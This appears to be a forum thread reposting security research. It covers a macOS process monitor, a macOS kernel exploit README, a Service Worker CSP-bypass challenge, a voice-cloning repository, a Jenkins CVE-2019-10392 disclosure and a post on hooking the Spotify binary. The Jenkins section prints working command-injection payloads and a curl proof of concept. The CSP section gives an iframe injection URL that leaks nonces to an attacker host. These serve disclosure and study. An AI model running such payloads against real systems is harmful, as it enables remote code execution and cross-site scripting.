start:block]; 37 38//run loop 39// as don't want to exit 40[[NSRunLoop currentRunLoop] run]; Once the [procMon start:block]; method has been invoked, the Process Monitoring library will automatically invoke the callback (block), on process events, returning a Process object. The Process object is declared in the library’s header file; ProcessMonitor.h. This object contains information about the process (responsible for the event), including: pid path ancestors signing info …and more! Take a peek at the ProcessMonitor.h file for more details. Once compiled, we’re ready to start monitoring for process events! Here for example, we run ls -lart . # ./processMonitor ... PROCESS EXEC ('ES_EVENT_TYPE_NOTIFY_EXEC') pid: 7655 path: /bin/ls uid: 501 args: ( ls, "-lart", "." ) ancestors: ( 6818, 6817, 338, 1 ) signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1 (true); signatureIdentifier = "com.apple.ls"; } PROCESS EXIT ('ES_EVENT_TYPE_NOTIFY_EXIT') pid: 7655 path: /bin/ls uid: 501 signing info: { cdHash = 5180A360C9484D61AF2CE737EAE9EBAE5B7E2850; csFlags = 603996161; isPlatformBinary = 1; signatureIdentifier = "com.apple.ls"; } exit code: 0 Once I receive the com.apple.developer.endpoint-security.client entitlement from Apple, I’ll release this pre-built binary (that links agains the “Process Monitor” framework)! Conclusion Previously, writing a (user-mode) process monitor for macOS was not a trivial task. Thanks to Apple’s new Endpoint Security Subsystem/Framework (on macOS 10.15+), it’s now a breeze! In short, one simply invokes the es_new_client & es_subscribe functions, to subscribe to events of interest (recalling that the com.apple.developer.endpoint-security.client entitlement is required). For a process monitor, we illustrated how to subscribe to the three process-related events: ES_EVENT_TYPE_NOTIFY_EXEC ES_EVENT_TYPE_NOTIFY_FORK ES_EVENT_TYPE_NOTIFY_EXIT We then showed how to extract the relevant es_process_t process structure and then parse out all relevant process meta-data such as process identifier, path, arguments, and code-signing information. Finally we discussed an open-source process monitoring library that implements everything we’ve discussed here today. 🥳 ❤️ Love these blog posts and/or want to support my research and tools? You can support them via my Patreon page! Sursa: https://objective-see.com/blog/blog_0x47.html
-
macOS-Kernel-Exploit DISCLAIMER You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for security researchers in a controlled lab environment. This exploit is intended for security research purposes only. General macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ). Thanks to @LinusHenze for this cool bug and his support ;P. Writeup Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started: VM: Download the macOS installer from the appstore and drag the .app file into VMWare's NEW VM window Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb Have a look at the _kernel_trap function Build I recommend setting the bootargs to: debug=0x44 kcsuffix=development -v ⚠️Note: SMAP needs to be disabled on macs after 2015 (-pmap_smap_disable) You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit) Downloading Xcode 9.4.1 Commandline Tools should be enough Download: https://developer.apple.com/download/more/ make Execution ./exploit <KASLR slide> Tested on macOS Mojave: Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64 Demo: Sursa: https://github.com/A2nkF/macOS-Kernel-Exploit/
-
Nonce-based CSP + Service Worker = CSP bypass? Service Worker is a great technology that allows you to develop web app's offline experience and increase performance of your website. But this also means that a web page is cached. And if your website has a nonce-based CSP, then your CSP will also be cached. This means, no matter how random the nonce is (and you serve different nonces for every request), as long as Service Worker sees that the request is same, it'll respond with cached content, which always have the same CSP nonce. To see if this can be exploited, I made a CSP bypass challenge. https://vuln.shhnjk.com/secure_sw.php#Guest Above page uses Strict CSP, and Service Worker code was taken from Google's SW intro page (second example you see when you click the link). So it should be safe against XSS bugs, right? Well, challenge was made in a way that it's possible to bypass Strict CSP, and I'm hoping that people will find this CSP bypass in real websites someday The challenge has 2 injection points. location.hash (Service Worker doesn't see the hash) Referrer passed to server (Service Worker doesn't see this either) There are many other sources of XSS that Service Worker doesn't use as a key for a request (e.g. Stored XSS payload can't be keyed either). Intended solution was following. https://attack.shhnjk.com/CSP_SW_bypass.html?%3Ciframe%20src=%27https://attack.shhnjk.com/get_nonce.html%27%20name=%27 Gareth wrote a great post about leaking information using <base> tag's target attribute even under Strict CSP. I used similar trick, which is iframe's name. I used referrer to inject iframe and name attribute leaked nonce of the legit script tag, and simply used a leaked nonce to execute script, through location.hash. This is possible because Service Worker doesn't care about changes in location.hash so it'll still serve cached content. On the other hand, @lbherrera_ solved the challenge using CSS. https://lbherrera.me/solver.html He used referrer to inject <input> tag and set nonce as a value, and then brute-forced nonce character one by one using CSS. When when brute-force identifies a character, it'll send a request to his server, which will set the cookie with a matched nonce character, and save whole nonce this way. After whole nonce is stolen, he would use the location.hash to perform XSS with proper nonce. Conclusion: Service Worker might help bypass nonce-based CSP Always fix XSS bugs even if XSS is blocked by CSP. Time to time, I find CSP bypass in the browser as well (e.g. this). All mitigations have bypasses Sursa: https://shhnjk.blogspot.com/2019/09/nonce-based-csp-service-worker-csp.html
-
Real-Time Voice Cloning This repository is an implementation of Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis (SV2TTS) with a vocoder that works in real-time. Feel free to check my thesis if you're curious or if you're looking for info I haven't documented yet (don't hesitate to make an issue for that too). Mostly I would recommend giving a quick look to the figures beyond the introduction. SV2TTS is a three-stage deep learning framework that allows to create a numerical representation of a voice from a few seconds of audio, and to use it to condition a text-to-speech model trained to generalize to new voices. Video demonstration (click the picture): Papers implemented URL Designation Title Implementation source 1806.04558 SV2TTS Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis This repo 1802.08435 WaveRNN (vocoder) Efficient Neural Audio Synthesis fatchord/WaveRNN 1712.05884 Tacotron 2 (synthesizer) Natural TTS Synthesis by Conditioning Wavenet on Mel Spectrogram Predictions Rayhane-mamah/Tacotron-2 1710.10467 GE2E (encoder) Generalized End-To-End Loss for Speaker Verification This repo News 20/08/19: I'm working on resemblyzer, an independent package for the voice encoder. You can use your trained encoder models from this repo with it. 06/07/19: Need to run within a docker container on a remote server? See here. 25/06/19: Experimental support for low-memory GPUs (~2gb) added for the synthesizer. Pass --low_mem to demo_cli.py or demo_toolbox.py to enable it. It adds a big overhead, so it's not recommended if you have enough VRAM. Quick start Requirements You will need the following whether you plan to use the toolbox only or to retrain the models. Python 3.7. Python 3.6 might work too, but I wouldn't go lower because I make extensive use of pathlib. Run pip install -r requirements.txt to install the necessary packages. Additionally you will need PyTorch (>=1.0.1). A GPU is mandatory, but you don't necessarily need a high tier GPU if you only want to use the toolbox. Pretrained models Download the latest here. Preliminary Before you download any dataset, you can begin by testing your configuration with: python demo_cli.py If all tests pass, you're good to go. Datasets For playing with the toolbox alone, I only recommend downloading LibriSpeech/train-clean-100. Extract the contents as <datasets_root>/LibriSpeech/train-clean-100 where <datasets_root> is a directory of your choosing. Other datasets are supported in the toolbox, see here. You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox. Toolbox You can then try the toolbox: python demo_toolbox.py -d <datasets_root> or python demo_toolbox.py depending on whether you downloaded any datasets. If you are running an X-server or if you have the error Aborted (core dumped), see this issue. Wiki How it all works (WIP - stub, you might be better off reading my thesis until it's done) Training models yourself Training with other data/languages (WIP - see here for now) TODO and planned features Contribution Feel free to open issues or PRs for any problem you may encounter, typos that you see or aspects that are confusing. I try to reply to every issue. I'm working full-time as of June 2019. I won't be making progress of my own on this repo, but I will still gladly merge PRs and accept contributions to the wiki. Don't hesitate to send me an email if you wish to contribute. Sursa: https://github.com/CorentinJ/Real-Time-Voice-Cloning
- 1 reply
-
- 5
-
-
Sep 12, 2019 CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins Two weeks ago I saw on GitHub a nice repository about pentesting Jenkins. I downloaded the latest alpine LTS build from Docker Hub and I started to play with it, ending up finding an authenticated Remote Command Execution by having an user with the Job\Configure (USE_ITEM) privilege. 🐱👤 Discovery I launched a Jenkins instance locally with Docker using the following command: docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine In my case, the software versions are: Jenkins 2.176.3 Git Client Plugin 2.8.2 Git Plugin 3.12.0 I proceed through the initial configuration and created a non administrative user. After logging in as user test, we create a new job definition via the web user interface. If we select in the SCM section Git as our source, we are asked to insert a Git URL. Let’s fuzz it! 🤖 If we try common command injection payloads, we noticed that we can’t execute arbitary commands, but if we input the string -v as URL, we will receive the following output: Failed to connect to repository : Command "git ls-remote -h -v HEAD" returned status code 129: stdout: stderr: error: unknown switch `v' usage: git ls-remote [--heads] [--tags] [--refs] [--upload-pack=<exec>] [-q | --quiet] [--exit-code] [--get-url] [--symref] [<repository> [<refs>...]] -q, --quiet do not print remote URL --upload-pack <exec> path of git-upload-pack on the remote host -t, --tags limit to tags -h, --heads limit to heads --refs do not show peeled tags --get-url take url.<base>.insteadOf into account --sort <key> field name to sort on --exit-code exit with exit code 2 if no matching refs are found --symref show underlying ref in addition to the object pointed by it -o, --server-option <server-specific> option to transmit We have just discovered that command line switches are interpreted correctly by Git, thanks to the error: unknown switch `v' message. Can we do more than printing the Git usage? Let’s find it out! 🕵️ Exploitation I looked at man git-ls-remote in order to see the available command options and I noticed the --upload-pack=<exec> flag. By trying --upload-pack=id, I got: Failed to connect to repository : Command "git ls-remote -h --upload-pack=id HEAD" returned status code 128: stdout: stderr: id: ‘HEAD’: no such user fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. The command id HEAD was executed on the system! 🤹 We can control the full command being executed using the following payload: --upload-pack="`id`" Failed to connect to repository : Command "git ls-remote -h --upload-pack="`id`" HEAD" returned status code 128: stdout: stderr: "`id`" 'HEAD': line 1: uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins): not found fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. We successfully executed the id command in the context of the jenkins user! 💥 Proof of Concept First we need to retrieve the CSRF Token and then issue the request: get crumb curl 'http://localhost:8080/securityRealm/user/test/crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'DNT: 1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://localhost:8080/' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'Cookie: <COOKIES>' --compressed send request curl 'http://localhost:8080/job/test/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl' -d "value=--upload-pack=`touch /tmp/iwantmore.pizza`" -H 'Cookie: <COOKIES>' -H 'Origin: http://localhost:8080' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,it;q=0.8' -H 'X-Prototype-Version: 1.7' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Jenkins-Crumb: <CRUMB>' -H 'Pragma: no-cache' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36' -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: text/javascript, text/html, application/xml, text/xml, */*' -H 'Cache-Control: no-cache' -H 'Referer: http://localhost:8080/job/test/configure' -H 'DNT: 1' --compressed Reporting I reported the issue to the Jenkins JIRA and in less than one week the vulnerability was confirmed to be fixed in the staging environment. Props to the Jenkins team for how they managed the responsible disclosure process, in particular to Daniel Beck and Mark Waite. 👏 Timeline 2019-09-03: vulnerability discovered 2019-09-03: vulnerability reported 2019-09-04: first response by the vendor 2019-09-04: vulnerability acknowledged 2019-09-07: fix available 2019-09-08: fix confirmed 2019-09-08: CVE-2019-10392 was issued 2019-09-11: pre announcement 2019-09-12: @TheHackersNews tweet 2019-09-12: fix released and public announcement Sursa: https://iwantmore.pizza/posts/cve-2019-10392.html
-
Skiptracing: Automated Hook Resolution Sam Lerner Sep 17 · 11 min read This post is the third part of my series about tracking skips in the Spotify client. This post is a direct continuation of my work on the MacOS client first detailed here: https://medium.com/@lerner98/skiptracing-reversing-spotify-app-3a6df367287d. Hardcoding Addresses In the previous article, I hooked the target functions using HookCase to track when the skip subprocedure was called. However, there was one big problem with this approach that I didn’t realize at the time. One day, I decided to see how many skipped songs I have logged. It seemed low. I then decided to skip a few songs and again print out the number of songs. It didn’t change. Dammit! Something broke and I have no clue what. Finding the Problem Let’s crack open Spotify in IDA and go to our hook addresses as a sanity check. In the previous article, I made a big deal about finding sub_100CC2E20 so let’s go there and see what could’ve gone wrong: This doesn’t look anything like our next procedure. In fact, 0x100CC2E20 isn’t even on an instruction boundary. This is a big problem. Going back to the mediaKeyTap method, we find a familiar-looking CFG: However, there is one big (highlighted) difference. The address of our called procedure has changed from 0x10006FE10 to 0x100069CF0, a difference of -24864 bytes. Now going to our function with the big switch statement: We see that is now located at 0x100067E40 when it was located at 0x10006DE40 previously: a difference of -24576. The closeness of these offsets gives us a clue to what is going on. My theory is that Spotify occasionally updates itself and on this particular update (or set of updates), around 24000 bytes were removed before our target procedures and a couple hundred were added in between them. This presents us with a conundrum: how do we find the correct addresses to hook when they could change between runs? The answer is Objective-C. Objective-C Objective-C is at heart a dynamic language. You can add methods to a class, change a method’s implementation, and do all sorts of fuckery at runtime. To support this behavior, the class information must be stored in the application binary somewhere. If you run objdump -h on the Spotify binary, you’ll see the following interesting sections: namely the sections that begin with __objc. The first section we’ll want to take a look at is the __objc_classlist section. While undocumented, this section contains an array of pointers into the __objc_data section where each pointer points to an objc_class struct. We will discuss the layout of the struct later. Our end goal will be to find the addresses of the unnamed next and previous subprocedures, but our bridge to these addresses will be mediaKeyTap method because we can always find it with the help of the Objective-C class data. Resolving Objective-C Methods The class that responds to the mediaKeyTap:receivedMediaKeyEvent: selector is SPTBrowserClientMacObjCAnnex. Therefore, we can iterate over the objc_class structures pointed to by the __objc_classlist section until the name of the struct is equal to SPTBrowserClientMacObjCAnnex. Let’s get to it. First, we have to iterate over the __objc_classlist section. But to do that, we need to know where the section is. This information is contained within the Mach-O header (which is why it was revealed with objdump -h). Parsing the Header There are plenty of existing articles about the Mach-O file format and the documentation is fairly lucid so I won’t go into too much detail here. All you really need to know is that there are several “segment load commands” contained within the header. A segment load command (LC) simply specifies a region of the file and where to map it into memory. Directly after the segment LC, there will be a number of section structs. Each section’s extent both within the file and virtual memory are contained within its corresponding segment but the sections offer a more fine-grained mapping. If you were paying attention before, the __objc_classlist section is contained within the __DATA segment. Therefore, we can find it’s region in the file like so: #include <mach-o/loader.h>FILE *fp; size_t i,j,curr_off; struct mach_header_64 header; struct load_cmd load_cmd; struct segment_command_64 seg_cmd; struct section_64 sect;struct section_64 objc_classlist_sect;fp = fopen("/Applications/Spotify.app/Contents/MacOS/Spotify", "r"); fread(&header, sizeof(header), 1, fp); Here, we are simply setting up some variables and reading in the Mach-O header. Then, we can iterate over the load commands: for (i=0; i<header.ncmds; i++) { fread(&load_cmd, sizeof(load_cmd), 1, fp); if (load_cmd.cmd != LC_SEGMENT_64) { fseek(fp, load_cmd.cmdsize - sizeof(load_cmd), SEEK_CUR); continue; } fread((char *)&seg_cmd + sizeof(load_cmd), sizeof(seg_cmd) - sizeof(load_cmd), 1, fp); if (strcmp(seg_cmd.segname, "__DATA")) { fseek(fp, load_cmd.cmdsize - sizeof(seg_cmd), SEEK_CUR); continue; } Here, we ignore any LC’s that are not segment LC’s (there are many different types specified in the ABI). Then, we read in the LC as a segment LC and ignore it if it is not the __DATA segment. Then, we will iterate over sections in the __DATA segment: for (j=0; j<seg_cmd.nsects; j++) { fread(§, sizeof(sect), 1, fp); if (!strncmp(sect.sectname, "__objc_classlist", 16)) { memcpy(&objc_classlist_sect, §, sizeof(sect)); break; } } break; } Once we find the section with the correct name, we copy it into our target variable and exit the loop. Now that we can iterate over the objc_class structs, we need to know how to get the class name and method names for each class. While the Objective-C runtime is open source, I couldn’t find the type declarations corresponding to the version of Objective-C used in the Spotify binary, so you can declare the types like so: The fields are of type uint64_t instead of pointers because they are used as offsets into the file. The __DATA segment could be mmap'd and then the values treated as pointers but this leads to complications when mmap is unable to allocate the segment at its original address. Anyways, the data field of objc_class “points” to an objc_class_data structure. This structure contains both the name of the class and a base_methods “pointer” to the methods defined for this class. The method list consists of an objc_methodlist struct followed by objc_methodlist.count objc_method structures. Each objc_method struct will tell us the method name and it’s imp pointer (and it’s type signature but we don’t really care about that). I’ll link to the code later but it’s a straightforward extension of the previous code listings to iterate through the classes to find our SPTBrowserClientMacObjCAnnex class and iterate through the class’s methods to find the mediaKeyTap:receivedMediaKeyEvent: selector. Finding the Call Assuming we have the imp pointer for our mediaKeyTap: method, we can then use the Capstone library to disassemble the function and find the call to the media key tap handler: #include <capstone/capstone.h>uint8_t code[500]; size_t start_addr, i, insn_count; uint64_t target_addr;csh handle; cs_insn *nsn;fseek(fp, (meth->imp) & 0xffffff, SEEK_SET); fread(code, 1, 500, fp);cs_open(CS_ARCH_X86, CS_MODE_64, &handle);start_addr = meth->imp; insn_count = cs_disasm(handle, code, 500, 0, &insn)for (i=0; i<insn_count; i++) { if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, 3")) continue; target_addr = strtoll(insn[i+2].op_str, NULL, 16); break; } We look for the “next” case (that is mov esi, 3) since if you look at the disassembly: this case actually comes first in memory. We then take the instruction two after the mov esi, 3 instruction to find our target call. Remember that this subprocedure is actually a wrapper for our final target, so we have to perform the same disassembly procedure on the following function: Taking note of the highlight, after checking some conditions, this function jumps to our final destination five instructions are preparing register esi with the contents of register r14d. Therefore, we can do something like: ...if strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, r14d")) continue;*reloc_addr = insn[i+5].address+1; *reloc_pc = insn[i+5].address + insn[i+5].size; target_addr = strtoll(insn[i+5].op_str, NULL, 16);... Here, when we find our sentinel instruction, mov esi, r14d, in addition to setting our target address (the address of the function with the large switch statement), we set two additional variables: reloc_addr and reloc_pc. To understand these two variables, we first need to cover how we will automate the hooking process. Automatic Hooking Normally, the control flow from our media key handler wrapper will look like: However, we will patch instructions to make it to look like: The redirect to “my MK Handler” will be done through patching the jmp sub_100067E40 instruction in the Wrapper to actually be jmp &new MK Handler. Since jmp tells the CPU to set the new program counter (PC) relative to where it currently is, we need to know what the program counter after this instruction occurs. This is where the variable reloc_pc comes into play. We set it to insn[i+5].address + insn[i+5].size because that is what the PC will be after the jmp executes. We also need to know the address of the relative offset in the jmp instruction in order to patch it. Since the jmp opcode is only one byte, we set reloc_addr to insn[i+5].address+1. Patching the jmp Now that we have the PC after the jump and the address of the offset, we can actually patch the instruction to jump to our own code. To do this, we will create a dylib and insert an LC_LOAD_DYLIB LC into the Mach-O load commands much like in my iOS post: https://medium.com/@lerner98/skiptracing-part-2-ios-3c610205858b. Assume in the library constructor, we called our resolve function and got three pieces of information: mkHandler, the address of Spotify’s media key handler function mk_reloc_addr, the address of the offset in the jump to mkHandler mk_reloc_pc, the PC after the aforementioned jump We now have to adjust the memory protections for the bytes we wish to write since by default the __TEXT segment has only RX permissions initially. Thankfully, the max protections specified in the binary are RWX (even though we could patch this as well). Let’s do this: uint64_t prot_mask; uint64_t prot_addr; size_t prot_size;prot_mask = ~((1 << 12) - 1); // since page size is 4k prot_addr = mk_reloc_addr & prot_mask; prot_size = 4 + mk_reloc_addr - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*mk_reloc_addr = (int32_t)((int64_t)(&new_mkHandler) - mk_reloc_pc);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); where new_mkHandler is defined as: void new_mkHandler(void ***appDelegate, int32_t keyCode); Note that we have to mask off the lower twelve bits of mk_reloc_addr since mprotect requires that the address we pass be page-aligned. We then need to adjust the size of our protected region from four bytes (since the jump offset is 32 bits) to account for the difference between mk_reloc_addr and prot_addr. Let’s put some dummy code in new_mkHandler just to see if we hit it: void new_mkHandler(void ***appDelegate, int32_t keyCode) { printf("here!\n"); exit(69); } To load our dylib, we can use the code from Part 2 to insert a LC_LOAD_DYLIB command into the Mach-O file. If we do this and run the Spotify application, then sure enough we should see our print statement (if running through the command line) and we should have a nice exit code. Overwriting the Function Pointers Now to call our own prev and next subprocedures instead of Spotify’s will require some ingenuity. To see why, let’s take a look at the “next” case in the MK handler switch statement: Note that in the beginning of the function, the app delegate pointer (in rdi) is moved into register r13. Therefore, the code dereferences the app delegate twice and then moves a function pointer at offset 0x58 of that struct into register r12. This is the register that holds the address to the next subprocedure and is called at the bottom of the listing. Looking through the rest of MK handler, we can see that the offset 0x58 into the rax struct is only referenced here, so we can safely overwrite the function pointer at that address so the address of our own next subprocedure will be loaded into r12 and subsequently called. If we look at the “prev” case, we can see that the exact same steps are taken except the function pointer is located at offset 0x50 in the rax struct. Therefore, we can write some code in our new_mkHandler to overwrite these function pointers because we can make no assumptions as to the address of rax struct before the MK handler is called. The code will look something like this: typedef prev_next_func_t(int64_t, int64_t, int64_t);uint64_t prot_mask; uint64_t prot_addr; size_t prot_size; uint64_t fp_off; uint64_t *fp;prot_mask = ~((1 << 12) - 1); // since page size is 4kfp_off = (uint64_t)(**appDelegate) + 0x50; fp = (uint64_t *)fp_off;prevHandler = (prev_next_func_t *)(*fp); nextHandler = (prev_next_func_t *)(*(fp+1));prot_addr = fp_off & prot_mask; prot_size = 16 + fp_off - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*fp = (uint64_t)(&new_prevHandler); *(fp+1) = (uint64_t)(&new_nextHandler);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); Where new_prevHandler and new_nextHandler are defined as: void new_prevHandler(int64_t p1, int64_t p2, int64_t p3); void new_nextHandler(int64_t p1, int64_t p2, int64_t p3); It can be seen from the disassembly that the prev and next subprocedures take three 64-bit parameters but we don’t really need to know what they are. One gotcha is that we should only overwrite the function pointers once. To see why, think about what will happen the second time new_mkHandler is called. We set prevHandler to the first function pointer. However, we have already overwritten this function pointer with &new_prevHandler. Therefore, when we want to actually go to the previous track in new_prevHandler and call (*prevHandler)(p1, p2, p3), we will actually be calling new_prevHandler and will eventually overflow the stack. Therefore, we add a simple guard at the beginning to check if we have already overwritten the handlers: if (gHandlersSet) goto call_original;... overwrite function pointers ... gHandlersSet = 1;call_original: (*mkHandler)(appDelegate, keyCode); Now in new_prevHandler and new_nextHandler, all we have to do is push/pop a skip when appropriate and call (*prevHandler)(p1, p2, p3) or (*nextHandler)(p1, p2, p3). Wrapping Up All that’s left to do is get the current track and player position. Since these are exposed by Objective-C methods, we can use the functionality of the Objective-C runtime to call the appropriate functions without any patching, much like in Part 2. Here’s the link to the final repository which I’ve refactored to include the MacOS and iOS code: https://github.com/SamL98/SPSkip. I hope you enjoyed this exploration in patching and automated reverse engineering — I sure did! The Startup Written by Sam Lerner The Startup Sursa: https://medium.com/swlh/skiptracing-automated-hook-resolution-74eda756533d